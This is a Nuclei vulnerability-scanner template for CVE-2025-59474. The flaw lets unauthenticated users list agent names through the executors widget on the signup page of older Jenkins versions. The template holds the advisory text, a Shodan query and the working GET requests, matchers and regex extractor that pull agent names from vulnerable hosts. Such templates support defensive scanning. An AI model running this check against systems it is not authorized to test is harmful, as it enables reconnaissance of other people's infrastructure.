id: CVE-2025-59474

info:
  name: Jenkins Sidepanel - Unauthorized Agent/Queue Exposure
  author: ivaldivieso
  severity: medium
  description: |
    Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.
  impact: Attackers can list agent names without required permissions, potentially exposing sensitive infrastructure details.
  remediation: Update to a version later than 2.527 or LTS later than 2.516.2.
  reference:
    - https://www.jenkins.io/security/advisory/2025-09-17/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59474
    - https://medium.com/@Th3hound/exposing-jenkins-agents-without-auth-research-on-cve-2025-59474-ff95a2e7d22a
  metadata:
    verified: true
    max-request: 2
    shodan-query: product:"jenkins"
  tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/signup"
      - "{{BaseURL}}/jenkins/securityRealm/signup"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Build Executor Status'
          - 'Estado del ejecutor'
          - 'id="executors"'
        condition: or

      - type: regex
        part: body
        regex:
          - 'href="[^"]*/computer/[^"]*/?"'

    extractors:
      - type: regex
        name: agents
        part: body
        group: 1
        regex:
          - 'href="[^"]*/computer/([^"/]+)/?"'
        internal: true

      - type: dsl
        dsl:
          - 'urldecode(agents)'
# digest: 4a0a0047304502206c0c2b8d5f43427d574175ba0732aa2d631e691aff951a69fcbe015639534ef3022100865d934dc1e61af850f5bcab8a8b4d625ba71c87cf5ec28610a66bbfee8435be:922c64590222798bb761d5b6d8e72950